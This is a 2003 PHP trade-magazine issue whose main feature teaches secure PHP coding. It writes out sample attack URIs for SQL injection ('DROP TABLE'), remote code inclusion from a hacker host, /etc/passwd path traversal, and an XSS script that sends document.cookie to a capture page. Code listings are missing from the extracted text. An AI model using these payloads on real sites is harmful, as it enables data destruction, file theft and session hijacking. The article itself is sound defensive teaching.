SEPTEMBER 2003
VOLUME II - ISSUE 9
The Magazine For PHP Professionals
Introduction to Bug Management Understand the need, the solutions, and the processes
Installing Java for PHP Demystify the beast
Creating a Reusable Menu System with XML and PHP
Advanced Database Features Exposed Come to terms with using the best tool for the job
Secure PHP
Using PHP's printer functions from Windows
Get Ready For php | Cruise See inside for details
Plus:
March 1st - March 5th 2004
Tips & Tricks, Product Reviews and much more...
Taking the key out of the lock
This copy is registered to: Liwei Cui
[email protected] www.phparch.com
Printing with PHP
We’ve got you covered, from port to sockets.
php | Cruise
Port Canaveral • Coco Cay • Nassau
March 1st - March 5th 2004 Signup now and save $100.00! Hurry, space is limited.
Visit us at www.phparch.com/cruise for more details. Andrei Zmievski - Andrei's Regex Clinic, James Cox - XML for the Masses, Wez Furlong - Extending PHP, Stuart Herbert - Safe and Advanced Error Handling in PHP5, Peter James - mod_rewrite: From Zero to Hero, George Schlossnagle - Profiling PHP, Ilia Alshanetsky - Programming Web Services, John Coggeshall - Mastering PDFLib, Jason Sweat - Data Caching Techniques Plus: Stream socket programming, debugging techniques, writing high-performance code, data mining, PHP 101, safe and advanced error handling in PHP5, programming smarty, and much, much more!
F R O M T H E E X P E R T S AT D E V E L O P E R ’ S L I B R A R Y. . .
Essential references for programming professionals
Elevate Your PHP with Advanced PHP Programming While there are many books on learning PHP and developing small applications with it, there is a serious lack of information on scaling PHP for large-scale, business-critical systems. Schlossnagle’s Advanced PHP Programming fills that void, demonstrating that PHP is ready for enterprise Web applications by showing the reader how to develop PHP-based applications for maximum performance, stability, and extensibility.
php|architect readers, get 40% off books in the Developer’s Library Visit www.developers-library.com and add the books of your choosing to your shopping cart. Upon check-out, enter the coupon code PHPARCH03 to receive discount. Offer valid through 12/31/03.
Advanced PHP Programming by George Schlossnagle ISBN: 0-672-32561-6 $49.99 US • 500 pages
MORE TITLES FROM DEVELOPER’S LIBRARY
PHP and MySQL Web Development, Second Edition
PHP Developer’s Handbook
MySQL, Second Edition
by John Coggeshall
by Paul DuBois
by Luke Welling and Laura Thomson
ISBN: 0-672-32511-X $49.99 US • 800 pages
ISBN: 0-7357-1212-3 $49.99 US • 1248 pages
ISBN: 0-672-32525-X $49.99 US • 912 pages DEVELOPER’S LIBRARY
www.developers-library.com
TABLE OF CONTENTS
php|architect Departments
6
Features
EDITORIAL From the front line
9
Secure PHP Coding by David Jorm and Jody Melbourne
I N D E X
7
What’s New!
19
Introduction to Bug Management by Dejan Bosanac
49
Product Review Lumenation and LightBulb
68
Book Review Core PHP Programming 3rd Edition
27
Advanced Database Features Exposed by Davor Pleskina
35
Creating a Reusable Menu System with XML and PHP by Leon Vismer
69
Tips & Tricks
45
By John W. Holmes
73
Bits & Pieces
by Marco Tabini
52
Real. Interesting. Stuff.
76
exit(0); Buy vs. Build By Marco Tabini
September 2003 · PHP Architect · www.phparch.com
Speaker on the High Seas
Printing with PHP by Alessandro Sfondrini
61
Installing Java for PHP by Dave Palmer
4
! W E N
Existing subscribers can upgrade to the Print edition and save! Login to your account for more details.
Buy now and save $10 off the price of any subscription† Visit: http://www.phparch.com/print for more information or to subscribe online.
php|architect Subscription Dept. P.O. Box 3342 Markham, ON L3R 9Z4 Canada Name: Address: City: State/Province: ZIP/Postal Code: Country:
php|architect The Magazine For PHP Professionals
Your charge will appear under the name "Marco Tabini & Associates, Inc." Please allow up to 4 to 6 weeks for your subscription to be established and your first issue to be mailed to you. *US Pricing is approximate and for illustration purposes only.
Choose a Subscription type: Canada/USA $ 81.59 $67.99 CAD ($59.99 $49.99 US*) International Surface $108.99 $94.99 CAD ($79.99 $69.99 US*) International Air $122.99 $108.99 CAD ($89.99 $79.99 US*)
Payment type: VISA
Mastercard
Credit Card Number: Expiration Date: E-mail address: Phone Number:
American Express
Signature:
Date:
*By signing this order form, you agree that we will charge your account in Canadian dollars for the “CAD” amounts indicated above. Because of fluctuations in the exchange rates, the actual amount charged in your currency on your credit card statement may vary slightly. †Limited time offer extended to September 30th, 2003.
To subscribe via snail mail - please detach this form, fill it out and mail to the address above or fax to +1-416-630-5057
EDITORIAL
php|architect n the relatively short time that I’ve been with php|architect (about six months now), I’ve seen a lot of our magazine content cross my (very messy) desk. In that same time period, I’ve been committed to gobbling up any and all PHP content gracing the pages of other publications and developer sites. I now feel that I am qualified to state an opinion: We have great content. Our authors consistently dig deep into their topics, bringing you their practical experience, examples, and well-written explanations. Their enthusiasm for their articles shines through, and brings warmth and community to the pages of php|architect every month. We constantly demand the best from our authors, and they, in turn, demand the best from us. The php|architect editorial team prides itself on being transparent, and I believe that authors enjoy writing for us because of it (maybe this helps explain why there are only two new authors and four return authors this month). By transparent, I mean that we are honest and up front with them, as well as ourselves. We view our authors as collaborators and team members, never as service providers or vendors. We are easy to work with, and are eager to bend over backward to help if we can see that an honest effort is being made. Through all of this we never compromise our integrity or settle for second best. Really, though, how could we? We serve one of the greatest software communities in the world! This brings me to my next point. I am absolutely ecstatic to have been bestowed the honor of directing the editorial path of php|architect. Our authors, our readers, and our editorial team have all worked hard to build an excellent resource that brings you the best that the PHP world has to offer each and every month. The hardest part of my new role here at php|a will probably be trying to fill Brian’s shoes – he’s got really big feet.* Brian has worked extremely hard to foster long-term relationships with our authors, and I will be working feverishly to continue to build and maintain that community, as well as various other initiatives on the front and back-end of the publication. But don’t worry, I’m still sleeping four hours a night. I sincerely hope you enjoy this month’s issue. People lost hair, sleep, and teeth over it. And, as always, if you see anything you particularly like or don’t like in our magazine this month, I strongly encourage you to send us your feedback at
E D I T O R I A L
R A N T S
I
September 2003 · PHP Architect · www.phparch.com
Volume II - Issue 9 September, 2003 Publisher Marco Tabini Editor-in-Chief Peter James
[email protected] Editor-at-Large Brian K. Jones
[email protected] Editorial Team Arbi Arzoumani Peter James Brian Jones Eddie Peloke Graphics & Layout Arbi Arzoumani, Hammed Malik, Marina Zlatogorov Managing Editor Emanuela Corso Director of Marketing J. Scott Johnson
[email protected] Account Executive Shelley Johnston
[email protected] Authors Dejan Bosanac, David Jorm, Dave Palmer, Davor Pleskina, Allessandro Sfondrini, Leon Vismer php|architect (ISSN 1705-1142) is published twelve times a year by Marco Tabini & Associates, Inc., P.O. Box. 3342, Markham, ON L3R 6G6, Canada. Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes no responsibilities with regards of use of the information contained herein or in all associated material.
Contact Information: General mailbox:
[email protected] Editorial:
[email protected] Subscriptions:
[email protected] Sales & advertising:
[email protected] Technical support:
[email protected] Copyright © 2002-2003 Marco Tabini & Associates, Inc. — All Rights Reserved
EDITORIAL
[email protected]. Even fan letters firmly stating that “You suck.” will be warmly accepted, as they help to break up the large amounts of spam that we all get from that address.
* Actually, I’ve never physically seen Brian, or Brian’s shoes... I’m pretty sure I can smell them, though.
php|a
When in Rome... Go to PHP Day 2003! he first conference dedicated exclusively to the Italian PHP Community, called PHP Day 2003, will take place on October 24, 2003 in Rome at the Universita’ Tor Vergata. The program includes several speakers from the Italian technical community, and focuses on the theme of interface development, as well as a few tutorials to get the beginners up and running. Most of all, PHP Day revolves around the concept of providing the PHP community with an opportunity to meet and exchange their experiences. If you live in Italy, this is a great opportunity to meet your fellow PHP enthusiasts. If you don’t live in Italy... this might be the perfect excuse for that long-postponed vacation! For more information on PHP Day, visit http://www.phpday.it or mail the organizers at
[email protected].
T
N E W
S T U F F
What’s New! PHP 4.3.3 PHP.net announced the release of PHP 4.3.3. This release contains a large number of bug fixes and it is recommended that all users ugrade to this version. Changes include: • Synchronized bundled GD Library with GD 2.0.15 • Upgraded the bundled Expat Library to version 1.95.6 • Improved the engine to use POSIX/socket IO where feasible • and much more..... Visit to php.net download or view the change log.
work built around the concepts of separation of concerns (making sure people can interact and collaborate on a project, without stepping on each other toes) and component-based web development. Cocoon implements these concepts around the notion of ‘component pipelines’, each component on the pipeline specializing on a particular operation. This makes it possible to use a Lego(tm)-like approach in building web solutions, hooking together components into pipelines without any required programming. Cocoon is “web glue for your web application development needs”. It is a glue that keeps concerns separate and allows parallel evolution of the two sides, improving development pace and reducing the chance of conflicts. Cocoon has a PHP Generator which is not included in the binary distribution but can be found at: cocoon.apache.org/2.1/ userdocs/generators/php-generator.html Get more information or download from the Cocoon Project Page:
Apache Cocoon 2.1 Apache Cocoon is a web development frame-
September 2003
●
PHP Architect
●
www.phparch.com
cocoon.apache.org/
7
NEW STUFF Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.” ZEND Studio 3.0.0 Beta Zend.com announced this month the release of the Zend Studio 3.0.0 Beta for Windows and Mac. The latest release includes: • Code Profiler – Determine which scripts are slowing down your project so you can focus your time on improving their performance • One-click debugging and profiling tool – Direct debugging and profiling of web pages directly from your browser • Code Analyzer – Pinpoint messy code, allowing you to write cleaner more correct code • Highlight syntax errors – Write clean PHP code while you are typing • Support for PHP 5.0 – Including syntax highlighting, code completion, file and project inspectors • Dramatic performance improvements • Code Completion improvements – Including improve speed, recognized constants, and new functions arguments view...and much more Get more information or download from Zend.com.
PhpBB 2.0.6 The phpBB Group is pleased to announce the release of phpBB 2.0.6 the “phew, it’s way to hot to be furry” Edition. This release had been made to fix a number of potential security related issues and more annoying bugs. Work continues on 2.2.0 and another 2.0.x release is not planned except where critical issues arise. phpBB.com describes phpBB as: ”...a high powered, fully scalable, and highly customisable open-source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
September 2003
●
PHP Architect
●
www.phparch.com
phpBB strongly advises all users to upgrade. Get more information for phpBB.com.
Japha 1.3.3 The Japha site touts it as “An Expandable Implementation of Java in PHP”. From Japha: (japha.xzon.net/index.html) “Japha is an attempt to bring the main classes in the Java 1.4.1 (soon to be 1.4.2, time allowing) to PHP for use in everyday programs. We do this using the syntax that has been made common with the new releases of PHP 5. This allows us to easily implement interface, abstract classes, and more inheritance capabilities, not to mention excellent error handling and the ability to better conform with user-created data types.” Get more information or download the latest version from Japha.xzon.net
LightBulb 4.79 LightBulb (formerly EzSDK) is a PHP SDK which includes a PHP source code generator, a library of PHP Classes, and an application environment consisting of premade supporting modules. The modules handle user application and data access security, DB compatibility, a built-in GUI interface with an interactive desktop and more. Check out this month’s product review for more information. This release contains changes to the spell checking features. Spell checking of user data is now an inherent, interactive user option throughout the system. Developers are able to utilize the spell check features throughout every application developed without writing any source code to facilitate this. Get more information or view the demo at ezsdk.com
php|a
8
Secure PHP Coding
F E A T U R E
by David Jorm and Jody Melbourne
eb applications, by their very nature, have a broad exposure to remote attackers and a set of potential vulnerabilities as rich as the languages and protocols from which they are born. Web applications are handling an ever-growing list of business functions, and the code driving them must be paid due attention with regard not only to performance and stability, but also to security. This article is aimed at providing a concise listing and discussion of the most common vulnerabilities that exist in PHP web applications. This vulnerability listing is used at the end of the article as the basis for developing coding and code audit/testing methodologies which can be applied to any PHP web application. Note that, for the sake of brevity, only the most common and severe vulnerabilities have been listed and that vulnerabilities outside the scope of PHP code – such as those which may exist in a web server or PHP itself – are not covered by this article.
W
NOTE: All examples use the HTTP GET method so that attacks can be easily illustrated as URIs. Keep in mind that using POST is no defence; the variables are simply in the HTTP message body rather than the query string component of the URI. From a theoretical perspective, at least, POST variables are just as easy to manipulate as GET variables.
September 2003
●
PHP Architect
●
www.phparch.com
SQL Injection An SQL injection vulnerability can rear its ugly head when user-submitted variables are used to assemble SQL queries on the server side without sufficient input validation. The underlying SQL statement can be manipulated or additional SQL statements injected by an attacker. SQL Injection is one of the most common web application vulnerabilities, but does not affect PHP code as much as other languages, mostly due to PHP’s automatic character escaping and built-in validation functions. A sample vulnerability is shown in Listing 1. A sample attack on that vulnerability might look like the following: http://www.server.com/listing1.php?artid= 0%20or%20ArticleID%20%200
Note that the value being passed to artid is a urlencoded version of “0 or ArticleID 0”. Making a call to the link above would cause the following value to be assigned to $ssql and exe-
REQUIREMENTS PHP: 4.0+ OS: N/A Applications: N/A Code Directory: secure_php
9
FEATURES
Secure PHP Coding in use. For example, asking for
Listing 1 1
http://example.com/items.php?itemID=123’
instead of http://example.com/items.php?itemID=123
could return a telltale error like this one:
cuted on the SQL server:
mySQL error with query SELECT myitem FROM shop_item WHERE itemid=123’;: You have an error in your SQL syntax near ‘’’ at line 1
SELECT ArticleContents FROM Articles WHERE ArticleID = 0 OR ArticleID 0
Some database servers also allow multiple SQL statements to be concatenated using a semicolon (;) as a separator. In that case, the following attack could be used: http://www.server.com/listing1.php?artid= 0;%20DROP%20TABLE%20Articles
In this case, the urlencoded value being passed into artid is “0; DROP TABLE Articles”. You can imagine the problems that this might cause. The key to protecting code against SQL injection attacks – also key for protecting against most web application vulnerabilities – is rigorous input validation. PHP can automatically escape some characters, such as apostrophes (‘), providing protection against attacks involving those characters, but this is not sufficient immunity. All user-controlled variables used to construct SQL statements or other commands must be stripped of any content that may alter the effects of the query. For numeric inputs, either verify that the value is indeed numeric, or make it numeric using settype(). For nonnumeric inputs, run the variable through addslashes() or addcslashes() before using it to construct a query. The vulnerable example above is patched in Listing 2. More information on patching against SQL injection is available at www.zend.com/manual/security.database.php. In testing for SQL injection, the blackbox tester studies application inputs and attempts to insert special characters (such as commas, apostrophes, semicolons, quotation marks, and equal signs) or SQL keywords (AND, OR, SELECT, INSERT, etc). With many of the popular backends, informative error pages are displayed by default, which can often give clues to the underlying SQL query September 2003
●
PHP Architect
●
www.phparch.com
It is evident from this response that the value for itemID is being used directly (without any validation) within an SQL query. PHP Code Injection When user-defined inputs form the file path parameters used to call include(), fopen() or other similar functions, there are several possibilities for exploitation. The first, PHP code injection, is based on manipulating the input to include() to run your own PHP code. The second, path traversal, is based on manipulating the input to include() or fopen() to display files or create an open proxy. Note that both of these bugs rely on the same basic problem and overlap somewhat. PHP code injection is similar to SQL injection, but involves native PHP code being injected by the user rather than SQL. This is made possible when the code makes use of the include() function. The include() function will accept a file name or URI (if the appropriate wrapper is installed) and include the contents of the resource as part of the PHP program. This is frequently used as a means of keeping libraries of code separate, and applications more modular, Listing 2 1 2 3 4 5 6 7 8 9 10
10
FEATURES
Secure PHP Coding
Listing 3 1 2 3 4 5 6 7 8 9
Listing 4
calling include() to load needed functions at runtime or ‘on demand’, but it’s also frequently mis-used to include local text files, or worse, remote data from a URI. PHP code injection is achieved by placing malicious PHP code inside a resource which is run through include(), or finding a way to have the include() call load something unintended by the application developer. A sample vulnerability is shown in Listing 3. A sample attack on that vulnerability might look like the following:
1 2 3 4 5 6 7 8 9 10 11
http://example.com/main.php?in=../test.inc
The response from the application might be some telltale warnings, like so: Warning: main(./../test.inc) [function.main]: failed to create stream: No such file or directory in main.php on line 102 Warning: main() [function.main]: Failed opening ‘./../test.inc’ for inclusion (include_path=’.:’) in main.php on line 102
http://www.server.com/listing3.php? page=http://www.hacker.com/ phpinjection.php
Making a call to the above link would cause the contents of www.hacker.com/phpinjection.php to be included into the program and executed locally. This page could output any malicious code the attacker can conjure up. The primary strategy for defending against code injection attacks is to use include() appropriately. Having URI file wrappers enabled is generally a security liability and if your site does not explicitly use them, they should be disabled. If it is necessary to have user manipulable variables run through include(), ensure that they are properly validated. Listing 3 is patched in Listing 4. When trying to locate these vulnerabilities via blackbox testing, the tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this elicits a response from the application which might aid an attack. Imagine that a regular (non-malicious) URL looks like this:
This response indicates that the value of the ‘in’ variable is being used within an include() call. In this case, an attacker would be able to submit a request such as: http://example.com/main.php?in=../../../.. /etc/passwd
to open (include) any readable file. Path Traversal Very closely related to PHP code injection is path traversal. Although Listing 4 protects against PHP code injection, it applies no input validation to the page GET variable, allowing the user to enter not just a file name but an absolute path. This can allow an attacker to view any file that the web server has permission to read. If URI wrappers were enabled, it would also allow an attacker to use the site as an open proxy to view Listing 5
http://example.com/main.php?in=links.inc
Let’s look at what we get if we change the query string a little, as follows:
September 2003
●
PHP Architect
●
www.phparch.com
1 2 3 4 5 6 7 8 9 10 11
11
FEATURES
Secure PHP Coding
other resources on the web. A sample vulnerability is shown in Listing 5. A sample attack on that vulnerability might look like the following: http://www.server.com/listing5.php?page= ../../../../../etc/passwd
Calling the above link might cause the contents of /etc/passwd to be returned to the attacker — obviously not what the script was supposed to do! If URI wrappers were enabled, the following attack could also be used: http://www.server.com/listing5.php? page=http://www.phparch.com
This would cause the web server to source the contents of the URI www.phparch.com and return them to the attacker, effectively working as an open proxy. Oh, what we wouldn’t do for our daily dose of PHP goodness! The key to defending against path traversal attacks is, once again, input validation. Ideally, all files that the script is serving can be numerically sequenced, requiring only a numeric input of the file number from the user. A patched version of Listing 5 using this method is shown in Listing 6. Alternatively, the page variable can be stripped of all characters which may allow a user to enter an absolute path or URI. A patched version of Listing 5 using this method is shown in Listing 7. These vulnerabilities can often be located through blackbox testing of the application. The tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this returns (or attempts to return) arbitrary files. Imagine that a regular (non-malicious) URL looks like this:
Listing 6 1
versal characters (../). fopen() and include() error messages are generally very informative in describing the error, and can give the tester all the information needed to correctly manipulate this request. Trusted User Manipulable Values A major problem with the web application environment and the advanced tools used within it, of which PHP is only one, is the fact that they hide the source of some inputs from the developer. For example, PHP will expose the contents of a form field, GET variable or POST variable indiscriminately as a variable with the same name as the field or HTTP variable. Developers come to rely on this feature and can fail to consider whether a trusted variable, such as the value of a product or name of a file, comes from a source which cannot be manipulated by an attacker. The classic example is hidden form fields used to carry session-related variables, such as the name and value for products on an e-commerce site. The developer is relying on the notion that since he has set these values, he will read them back in from the subsequent form, unchanged. But when a form is submitted, the contents of the form fields are simply passed to the resource in the FORM tag’s ACTION attribute as either GET or POST variables, as specified by the METHOD attribute. An attacker can then change the price of products by making his own form carrying the desired values, or manipulating GET/POST vari-
http://example.com/viewfile.php?cat=users
Listing 7 To test for path traversal, we might use the following URL’s: http://example.com/viewfile.php?cat=/etc /motd http://example.com/viewfile.php?cat=../.. /../../etc/passwd
If the tester receives a ‘File not found’ or ‘Cannot open’ error, it may simply be a matter of adjusting paths or increasing the amount of traSeptember 2003
●
PHP Architect
●
www.phparch.com
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
12
FEATURES
Secure PHP Coding
Listing 9
Listing 8 1 2 3 4 5 6 7 8 9
Weak Authentication Despite the widespread gospel that clear-text authentication credentials are a cardinal sin and that passwords should conform to minimum complexity rules, these fundamentals of secure programming are frequently not applied in the web application world. HTTP includes two standard authentication mechanisms: basic and digest. Both mechanisms operate as a series of HTTP exchanges with a demand for authentication issued by the server in an HTTP header, followed by a repeated request from the client, including authentication credentials in another HTTP header. The primary difference is that basic authentication uses clear text and is simply base64 encoded, while digest is encrypted using a nonce (time senListing 11 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
13
FEATURES
Secure PHP Coding
sitive value) issued by the server as a key. Basic authentication can be set up easily by using PHP’s header() function to issue the required header. The $_SERVER[‘PHP_AUTH_USER’] and $_SERVER[‘PHP_AUTH_PW’] variables are created by PHP when a request has included authentication credentials. This is, unfortunately, promoted by many tutorials on PHP programming. The main alternative to basic HTTP authentication is to have a custom solution where a session id or cookie is issued to the client once it has successfully authenticated – this token then being checked with each subsequent request for a protected resource. This relies on the developer correctly enforcing password complexity rules and is vulnerable to replay attacks. A sample vulnerability is shown in Listing 13 (allowing a weak password to be set) and 14 (doing effectively clear-text authentication). Lack of complexity rules can make you vulnerable to brute force attacks, because with short and common passwords little key space will need to be exhausted before an attacker finds his way in. Brute force attacks most commonly work either from a dictionary file of common words, or in an incremental mode trying every possible string. Sometimes a hybrid of the two is used, attaching short incremental suffixes and prefixes to common words. Listing 15 is an example of an incremental-mode brute-forcing tool. Basic HTTP authentication is vulnerable only to third party attack, where an attacker is sniffing or otherwise intercepting the site’s communication and extracting the clear text authentication credentials. No sample attack is provided for extracting clear text credentials. There is no patch, as such, for the use of basic Listing 13 1 2 3 4 5 6 7 8 9 10 11 12 13
September 2003
●
PHP Architect
Listing 15 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
Listing 14 1 2 3 4 5 6 7 8 9 10 11
HTTP authentication. The point was merely to illustrate that its use, without SSL or some other form of encryption, is a security liability. Password complexity rules, however, can be applied in a variety of ways. PHP functions are available to utilise the CrackLib library to check the strength of passwords. The strength is determined by length, use of upper and lower case and dictionary checks. If CrackLib is not available or you wish to enforce custom business rules for password strength, writing your own implementation is simple. Listing 13 is patched using a custom password strength test in Listing 16 To identify these vulnerabilities, the blackbox tester must first identify the authentication method in use. If basic HTTP authentication is
●
www.phparch.com
14
FEATURES
Secure PHP Coding
being used, the tester can attempt to brute-force a valid login and password pair – in most cases, account lockout restrictions are not enforced. There are many tools available online to test the strength of basic HTTP authentication. One of the more popular password cracking tools is Cain&Abel – available from http://www.oxid.it/cain.html Poorly-Applied Authentication Authentication mechanisms can sometimes fail to cover every access method for a resource and restrict access accordingly. The classic example is a menu driven by permissions associated with authentication credentials providing access to a list of resources the user is allowed to view. The resources themselves, however, do not require authentication credentials and rely on the notion that they are hidden unless access to them is provided via a menu. This is security through obscurity, and is a major flaw. A recent high-profile example of this problem is an Australian Taxation Office site where a user provided detailed credentials to authenticate their identity and were then allowed to view details associated with their Tax File Number. The page providing this access simply accepted the Tax File Number as a GET variable, such as: http://www.ato.gov.au/viewtfn.php?tfn= 231897
An attacker could simply plug in another TFN to view its details: http://www.ato.gov.au/viewtfn.php?tfn= 999999
A sample vulnerability is shown in Listings 17 (the menu) and 18 (the resource). A sample attack on that vulnerability might look like the following: http://www.server.com/listing18.php?res=1
By accessing the above URI, an attacker can bypass the authentication applied by Listing 17, and go straight to the resource (Listing 18) it was designed to provide access to. The best strategy to avoid these kinds of problems is to apply authentication at every individual resource, so it can never be bypassed. In the production world, your authentication would never be as simple as the ‘if’ test used in Listing 17, so a convenient technique is to create an authentication September 2003
●
PHP Architect
●
www.phparch.com
class and include it with every resource. These vulnerabilities are patched by Listings 19 (the authentication class) and 20 (the protected resource). Authentication and logic flaws in applications can sometimes be located via blackbox testing methods. The tester, using valid credentials, authenticates to the application and interacts as a normal user. At every point beyond the initial authentication routine, the tester locates any GET and POST variables, manipulates them using valid data, and examines the output. Imagine that a Listing 16 1 2 3 4 5 6 7 8 9 10 11 12 13 14
Listing 17 1 2 3 4 5 6 7 8 9 10
17
Listing 18 1 2 3 4 5 6 7 8 9 10
15
FEATURES
Secure PHP Coding
regular (non-malicious) URI looks like this: http://example.com/members/index.php? startpg=10167&lang=en
A sample vulnerability is shown in Listing 21. A sample attack on that vulnerability might look like the following: http://www.server.com/listing21.php?query= %3Cscript%3Efor+%28i%3D0%3B+ i%3C100%3B+i%2B%2B%29+%7B+ window.open%28%27http%3A%2F%2Fwww. porn.com%2F%27%29%3B%7D+ %3C%2Fscript%3E
A blackbox tester might try the following: http://example.com/members/index.php? startpg=10169&lang=en
In the above example, the user might expect to receive an ‘unauthorized’ error message when attempting to submit an alternate ‘startpg’ variable. If authentication has only been applied to the application portal page (and subsequent requests are not being re-authenticated) an attacker may be able to request arbitrary start pages. Cross-Site Scripting Many sites, such as message forums, allow a user to enter content and post it to the site. This is usually handled using an SQL database to store messages and PHP code to add and render posts on demand. If the contents of these messages are not stripped for HTML tags and Javascript code, an attacker can effectively inject client-side scripts which will be run under the security context of the message forum. This vulnerability, however, is not limited to message forums. Any site where the contents of user-defined variables such as GET/POST variables, HTTP headers or cookies will form part of the page returned can be vulnerable to cross-site scripting, or XSS. As an example of XSS outside of a classic message forum example, take the following URI:
This would cause the “query” GET variable to contain: <script>for (i=0;ialert(document.cookie);” . This will run the Javascript code alert(document.cookie); within the security context the user has set for ninemsn.com.au. This will expose the user’s cookie for the site. On a message board this could well include a session id token which could be replayed to hijack their session. This could then be logged to a remote capture application using Javascript code such as: <script>window.open(‘http://www.server.com /capture.php?cookie=’ + document.cookie);
September 2003
●
PHP Architect
●
www.phparch.com
Listing 20 1 2 3 4 5 6 7 8 9 10 11 12 13 14
Listing 21 1 2 3 4 5 6
16
FEATURES
Secure PHP Coding
tionality of the site. A better strategy is to parse user-defined inputs after they have been used by the PHP script, but before being returned as part of the response, to replace ‘’ characters with ‘’ respectively. This will prevent ‘<script>’ or other tags from being injected. Listing 21 is patched using this technique in Listing 22. Cross-site scripting vulnerabilities are generally quite easy to locate using blackbox testing methods. The tester examines all GET and POST variables to determine if any of these values are being returned within page outputs. In the example below, the tester can safely assume that the contents of the Title variable will be used somewhere within the returned page. Imagine that a regular (non-malicious) URI looks like this:
A sample attack on that vulnerability might look like the following: http://www.server.com/listing23.php
If an attacker runs the above URI when the database server is down and /mnt/data/file1.txt is not available, the following error (with HTML removed) will be given by PHP: Warning: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2 Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2
http://example.com/index.php?articleID= 1234&Title=Annual%20Report
Warning: fopen(“/mnt/data/file1.txt”, “rb”) - No such file or directory in C:\PHP\phparch\env.php on line 3
The tester inserts HTML special characters () into the Title variable and resubmits the request. http://example.com/index.php?articleID= 1234&Title=TESTING
If the injected HTML can be found within the returned page, then this application is vulnerable to cross-site scripting. In this case, if the Title value is being used directly between and tags, without filtering of characters, additional HTML and Javascript can be injected into the returned page. Environment Information Disclosure By default, PHP displays all warnings and errors. These frequently contain verbose information pertaining to the operating environment, such as file paths, database credentials and configuration details. A sample vulnerability is shown in Listing 23.
This discloses both the name of the database server and the path from which the script is reading files. Although this does not open the site to any specific attack, it is not good security practice to disclose this kind of information The best strategy to prevent this is to disable error reporting on production sites and reserve it for development use. This is best implemented in php.ini but is illustrated using the error_reporting() function in Listing 24. The blackbox tester inserts special characters into all identified GET and POST variables in an attempt to elicit exception conditions from the application. Errors from failed include(), popen(), fopen() and DB-related calls can be extremely informative and may assist the tester in identifying further vulnerabilities. Imagine that a regular (non-malicious) URI looks like this: http://example.com/index.php?articleID=1234
Listing 22 1 2 3 4 5 6 7 8
Listing 23 1 2 3 4 5 6 7 8
Listing 24
September 2003
●
PHP Architect
●
www.phparch.com
1 2 3 4 5 6 7 8
17
FEATURES
Secure PHP Coding
The server’s response could be as follows: Warning: Supplied argument is not a valid MySQL-Link resource in /www.example.com/cgi-bin/index.php on line 46 Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘sql.example.com’ (2) in /www.example.com/cgi-bin/index.php on line 45
Secure Coding Methodology The key to coding secure web applications in PHP is to be aware of the potential flaws that your code may be vulnerable to, and be attentive in preventing these flaws throughout the entire development process. Too often security is an afterthought or added feature. The most secure code is written with security in mind from the word ‘go’. Testing Methodology The blackbox testing method is where a security professional attempts to expose flaws in an application. The term ‘blackbox’ refers to the closed-source or proprietary application, and the process of manipulating known inputs and analyzing outputs from the application. In blackbox testing PHP code, the tester examines the application and identifies all of the expected GET and POST variables, including hidden and dynamically-generated variables. These variables are then manipulated using potentially “unexpected” values – such as special characters and type-mismatched or oversized requests. In most cases, the PHP applications’ expected inputs can be identified by reading all available HTML source pages, and/or capturing and decoding valid requests. As an example, examine the following URI:
and modified locally. Manipulated GET variables can be submitted using a regular browser. Unexpected behavior may take the form of half-loaded or blank pages, or a redirect to a front page. If the application displays an error message, the tester can determine if it is vulnerable to any of the common PHP coding errors detailed in this article. Conclusion Web applications are, in security terms, a different ball game from conventional applications. The communication protocols, server-side application code and client-side presentation code combine to form a development environment in which bugs can make use of problems in various components of the technology simultaneously. To compound this problem, web technology was originally designed to handle the public dissemination of markup documents, not the development of secure applications. This is slowly being rectified, but the developer must remain astute to security concerns if he is to produce secure applications. Hopefully what has been outlined above can assist in the creation of more secure web applications.
http://example.com/story.php?ID=33&title= Updates&lang=en
In the above example, the GET variables that should be manipulated and tested are ID, title and lang. As another example, examine the form in Listing 25. Here, the POST variables to be tested are ‘sid’, ‘listid’ and ‘usermail’. The tester inserts special characters into each of these inputs, and submits the request. Output is analyzed to determine if the application handled the input correctly, or if some unexpected error has occurred. Manipulated POST variables can be submitted using a command-line tool such as lynx or curl, or a copy of the form input page can be saved September 2003
●
PHP Architect
●
www.phparch.com
Listing 25 1 2 3 4 5 6
Email:
About the Author
?>
David works as a document imaging and OCR programmer for a small Australian company. He spends his spare time writing PHP code and studying environmental science.
Click HERE To Discuss This Article http://forums.phparch.com/44 18
Introduction to Bug Management
F E A T U R E
by Dejan Bosanac
What is a bug? It all started in 1945 at Harvard University, while testing the Mark II Aiken Relay Calculator for malfunction. A moth was found trapped between two electrical relays. Operators removed the moth and entered the log entry “First actual case of bug being found.” They said that they had “debugged” the machine and the term “debugging a computer program” was introduced. Anyone who has ever used any kind of software is familiar with the term “bug”. But before we proceed further with our story, we should make it clear what we mean by this term. Classic definition of the bug is that it is an error in software code that causes the program to malfunction. We must be careful with this, however, because it is very closely related to the requirements of our project. We can’t tell that something is not working properly unless we know the desired behavior. Some users for example, can interpret lack of certain functionality as a bug. Because of this thin line between bugs and functionality, it is a good practice to do request tracking along with the bug tracking process, as we will see later in the text. We will introduce a new term (issue), to describe both bugs and feature requests. The layman would say that bugs in software are only the result of programmer carelessness, but anyone who has ever worked on a large software project knows that is not always true. Sometimes projects are so complicated that a minor change in one module could produce an unexpected disaster September 2003
●
PHP Architect
●
www.phparch.com
